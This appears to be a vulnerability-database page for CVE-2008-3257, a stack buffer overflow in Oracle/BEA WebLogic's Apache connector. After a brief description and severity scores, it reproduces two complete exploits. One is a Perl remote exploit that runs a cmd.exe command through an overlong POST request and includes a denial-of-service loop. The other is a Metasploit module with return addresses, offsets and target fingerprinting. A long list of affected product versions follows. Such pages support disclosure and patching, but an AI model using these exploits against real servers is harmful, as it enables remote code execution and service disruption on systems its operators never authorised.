Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 6089
Publication date : 2008-07-16 22h00 +00:00
Author : kingcope
EDB Verified : Yes
#// Bea Weblogic -- Apache Connector Remote Exploit +-1day
#// Should stack break latest Windows Server 2003 <address space randomization>
#// BIG THANKS TO
#// "dong-hun you"(Xpl017Elz) in INetCop - for his paper
#// "Title: Advanced exploitation in exec-shield (Fedora Core case study)"
#// His technique works fine against Windows 2003 latest version.
#//
#// The code is broken, since I am chilling out for now
#// SKIDDI BULLETPROOF
#// You may fixup the DoS Code, Windows Code Works on English OSs
#// KingCope -- July/2008
use IO::Socket;
use strict;
$|=1;
my $apacheport = 80; #// Touch
###
my $wrongusage = 0;
my $dodoshost = 0;
###############################################################################
### Target List Entries |Operating System and Patch Level / Kernel Version|
###############################################################################
my @targets = ();
my @tgtname = ();
print "-" x 80;
$targets[0] = "1 Windows Server 2003 Enterprise Edition SP2 RC1 -- English\n";
$tgtname[0] = $targets[0];
$targets[100] = "2 Denial of Service\n";
$tgtname[100] = $targets[100];
###############################################################################
### Print Of Target List And Usage
###############################################################################
print "\n";
print "Bea Weblogic -- Apache Connector Remote Exploit\n\n";
print "Target List:\n";
foreach my $target (@targets) {
print $target;
}
print "\n\n";
print "-" x 80;
print "Usage: perl bea-unlock.pl <hostname or ip> <target>";
print "\n";
printusage:
if ($wrongusage == 1) { exit; }
################################################################################
### Argument Parsing
################################################################################
my $host = $ARGV[0];
my $target = $ARGV[1];
if (($host == "") || ($target == "")) {
$wrongusage = 1;
goto printusage;
}
################################################################################
### Setup Socket
################################################################################
setupsocket:
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $apacheport,
Proto => 'tcp');
if ($dodoshost == 1) {
goto doshost;
}
################################################################################
### Select Target
################################################################################
if ($target == 1) {
print "Exploiting $host -- " . $tgtname[$target-1];
goto winexpl;
}
if ($target == 2) {
print "Attacking Host $host -- Denial of Service -- Wait ...\n";
goto doshost;
}
################################################################################
### Exploitation of Windows Versions
################################################################################
winexpl:
####WORKS [LOOKUP THE HOSTNAME]
my $command = "echo works > c:\\desiredfile.txt";
my $cmds = "cmd.exe /c \"$command\"|";
my $sc = $cmds;
#### STACKBREAKING WITH WINEXEC() ON WINDOWS
my $c = "C" x 97 . pack("L", 0x10013930) x 3 . pack("L", 0x10013930) . pack("L", 0x10013931) . pack("L",0x77EA411E);
my $a = $cmds . "A" x (4000-length($cmds)) . $c;
print $sock "POST /.jsp $a\r\nHost: localhost\r\n\r\n";
while (<$sock>) {
print;
}
################################################################################
### Denial of Service Against The Apache Frontend Module For Bea Weblogic
################################################################################
####NEEDS SOME FIXUP
doshost:
$dodoshost = 1;
while(1) {
$a = "A" x 6000;
goto setupsocket;
print $sock "POST /.jsp $a\r\n\r\nHost: localhost\r\n\r\n";
while(read($sock,$_,100)) {
my $dosagain = 0;
if ($dosagain eq 1) {
"Server is down now\n";
exit;
}
if ($_ =~ /Server/) {
print ".";
$dosagain = 1;
next;
}
}
}
# milw0rm.com [2008-07-17]
Exploit Database EDB-ID : 18897
Publication date : 2012-05-18 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Apache/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the BEA
Weblogic Apache plugin.
The connector fails to properly handle specially crafted HTTP POST
requests, resulting a buffer overflow due to the insecure usage
of sprintf. Currently, this module works over Windows systems without DEP,
and has been tested with Windows 2000 / XP.
In addition, the Weblogic Apache plugin version is fingerprinted with a POST
request containing a specially crafted Transfer-Encoding header.
},
'Author' =>
[
'KingCope', # Vulnerability Discovery and PoC
'juan vazquez', # Metasploit Module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2008-3257' ],
[ 'OSVDB', '47096' ],
[ 'BID', '30273' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => true,
'Platform' => 'win',
'Payload' =>
{
'Space' => 4000,
'BadChars' => "\x00\x0d\x0a\x3f"
},
'Targets' =>
[
[ 'Automatic', {} ],
[ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
{
'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so
'Offset' => 4102
}
],
[ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
{
'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so
'Offset' => 4102
}
],
[ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
{
'Ret' => 0x10020e31, # push esp # ret # mod_wl_20.so
'Offset' => 4102
}
]
],
'DisclosureDate' => 'Jul 17 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),
], self.class)
end
def check
fingerprint = fingerprint_mod_wl
case fingerprint
when /Version found/
return Exploit::CheckCode::Vulnerable
when /BEA WebLogic connector vulnerable/
return Exploit::CheckCode::Appears
when /BEA WebLogic connector undefined/
return Exploit::CheckCode::Detected
when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/
return Exploit::CheckCode::Safe
end
end
def exploit
# Autodetect BEA mod_wl version
my_target = get_target
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("BEA mod_weblogic not supported")
return
end
uri = target_uri.path
sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)
sploit << [my_target.ret].pack("V")
sploit << payload.encoded
send_request_cgi({
'method' => 'POST',
'uri' => "#{uri} #{sploit}",
})
handler
end
def get_target
return target if target.name != 'Automatic'
fingerprint = fingerprint_mod_wl
case fingerprint
when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
return targets[1]
when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
return targets[2]
when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
return targets[3]
else
return nil
end
end
def fingerprint_mod_wl
my_data = rand_text_alpha(rand(5) + 8)
res = send_request_cgi(
{
'method' => 'POST',
'uri' => target_uri.path,
'headers' =>
{
'Transfer-Encoding' => my_data
},
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
})
if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
case res.body
when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)
return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)
return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)
return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
# Check for dates prior to patch release
when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
build_date = Date.parse($1)
if build_date <= Date.parse("Jul 28 2008")
return "BEA WebLogic connector vulnerable"
else
return "BEA WebLogic connector no vulnerable"
end
else
return "BEA WebLogic connector undefined"
end
end
return "BEA WebLogic connector not found"
end
end
Products Mentioned
Configuraton 0
Bea>>Weblogic_server >> Version 3.1.8
- Bea>>Weblogic_server >> Version 3.1.8 (Open CPE detail)
Bea>>Weblogic_server >> Version 4.0
- Bea>>Weblogic_server >> Version 4.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 4.0.4
- Bea>>Weblogic_server >> Version 4.0.4 (Open CPE detail)
Bea>>Weblogic_server >> Version 4.5
- Bea>>Weblogic_server >> Version 4.5 (Open CPE detail)
Bea>>Weblogic_server >> Version 4.5.1
- Bea>>Weblogic_server >> Version 4.5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 4.5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 4.5.1
- Bea>>Weblogic_server >> Version 4.5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 4.5.2
- Bea>>Weblogic_server >> Version 4.5.2 (Open CPE detail)
- Bea>>Weblogic_server >> Version 4.5.2 (Open CPE detail)
- Bea>>Weblogic_server >> Version 4.5.2 (Open CPE detail)
Bea>>Weblogic_server >> Version 4.5.2
- Bea>>Weblogic_server >> Version 4.5.2 (Open CPE detail)
Bea>>Weblogic_server >> Version 4.5.2
- Bea>>Weblogic_server >> Version 4.5.2 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 5.1
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 5.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.0
- Bea>>Weblogic_server >> Version 6.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.0
Bea>>Weblogic_server >> Version 6.0
Bea>>Weblogic_server >> Version 6.0
Bea>>Weblogic_server >> Version 6.1
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.1
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.1
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.1
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.1
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.1
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.1
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.1
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 6.1
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 6.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0
- Bea>>Weblogic_server >> Version 7.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0.0.1
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0.0.1
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0.0.1
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0.0.1
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 7.0.0.1
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 7.0.0.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 8.1
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 8.1
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 8.1
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 8.1
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 8.1
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 8.1
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 8.1
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 8.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 9.0
- Bea>>Weblogic_server >> Version 9.0 (Open CPE detail)
- Bea>>Weblogic_server >> Version 9.0 (Open CPE detail)
Bea>>Weblogic_server >> Version 9.0
Bea>>Weblogic_server >> Version 9.0
Bea>>Weblogic_server >> Version 9.0
Bea>>Weblogic_server >> Version 9.0
Bea>>Weblogic_server >> Version 9.0
Bea>>Weblogic_server >> Version 9.0
Bea>>Weblogic_server >> Version 9.1
- Bea>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 9.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 9.1
- Bea>>Weblogic_server >> Version 9.1 (Open CPE detail)
- Bea>>Weblogic_server >> Version 9.1 (Open CPE detail)
Bea>>Weblogic_server >> Version 9.2
- Bea>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Bea>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Bea>>Weblogic_server >> Version 9.2 (Open CPE detail)
- Bea>>Weblogic_server >> Version 9.2 (Open CPE detail)
Bea>>Weblogic_server >> Version 9.2
- Bea>>Weblogic_server >> Version 9.2 (Open CPE detail)
Bea>>Weblogic_server >> Version 9.2
- Bea>>Weblogic_server >> Version 9.2 (Open CPE detail)
Bea>>Weblogic_server >> Version 10.0
- Bea>>Weblogic_server >> Version 10.0 (Open CPE detail)
Bea_systems>>Apache_connector_in_weblogic_server >> Version *
Bea_systems>>Weblogic_server >> Version 10.0_mp1
Oracle>>Weblogic_server >> Version To (including) 10.3
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 6.1 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
- Oracle>>Weblogic_server >> Version 7.0 (Open CPE detail)
